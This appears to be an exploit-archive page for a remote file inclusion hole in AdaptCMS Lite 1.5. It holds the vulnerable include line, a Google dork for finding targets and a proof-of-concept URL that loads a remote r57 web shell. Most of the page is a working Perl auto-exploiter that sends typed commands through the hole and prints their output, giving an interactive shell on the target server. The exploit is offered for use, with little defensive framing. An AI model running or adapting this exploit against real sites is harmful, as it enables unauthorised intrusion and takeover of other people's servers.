-
Notifications
You must be signed in to change notification settings - Fork 16
/
Copy path10040.txt
98 lines (75 loc) · 2.71 KB
/
10040.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability
=====================================================
[!] Application : AdaptCMS Lite
[!] Vendor : www.insanevisions.com
[!] Version : 1.5 Other versions may also be affected
[!] Download : http://sourceforge.net/projects/adaptcms/files/
[!] License : Free
[!] Vulnerable : Remote File Inclusion
[!] Google Dork : Copyright 2006-2009 Insane Visions
[o] Description
AdaptCMS is a PHP CMS that is made for complete control of your website,
easiness of use and easily adaptable to any type of website.
It's made easy with advanced custom fields,
a very simple but powerful template system and much more.
Vuln Code & PoC
***************
Vuln: include_once($sitepath."includes/rss/simplepie.inc");
PoC : http://server/plugins/rss_importer_functions.php?sitepath=http://localhost/r57.txt??
AdaptCMS Lite Auto Exploiter
****************************
#!/usr/bin/perl -w
##################################################################
# - register_globals = on #
# - allow_url_include = on #
# - allow_url_fopen = on #
##################################################################
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use Getopt::Long;
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}
&clear();
sub banner {
&clear();
print "|---------------------------------------------|\n";
print "| AdaptCMS Lite RFI Auto Injector |\n";
print "|---------------------------------------------|\n\n";
print "Usage:\n";
print " perl $0 -u \"http://target/[path]/\" -fuck \"http://localhost/r57.txt??\"\n\n";
exit();
}
my $options = GetOptions (
'help!' => \$help,
'u=s' => \$u,
'fuck=s' => \$fuck
);
&banner unless ($u);
&banner unless ($fuck);
chomp($u);
chomp($fuck);
while (){
print "[shell]:~\$ ";
chomp($cmd=<STDIN>);
if ($cmd eq "exit" || $cmd eq "quit") {
exit 0;
}
my $ua = LWP::UserAgent->new;
$iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
chomp($iny);
my $own = $u . "/plugins/rss_importer_functions.php?sitepath=" . $fuck . $iny;
chomp($own);
my $req = HTTP::Request->new(GET => $own);
my $res = $ua->request($req);
my $con = $res->content;
if ($res->is_success){
print $1,"\n" if ( $con =~ m/readonly> (.*?)\<\/textarea>/mosix);
}
else
{
print "Exploiting failed !!\n";
exit(1);
}
}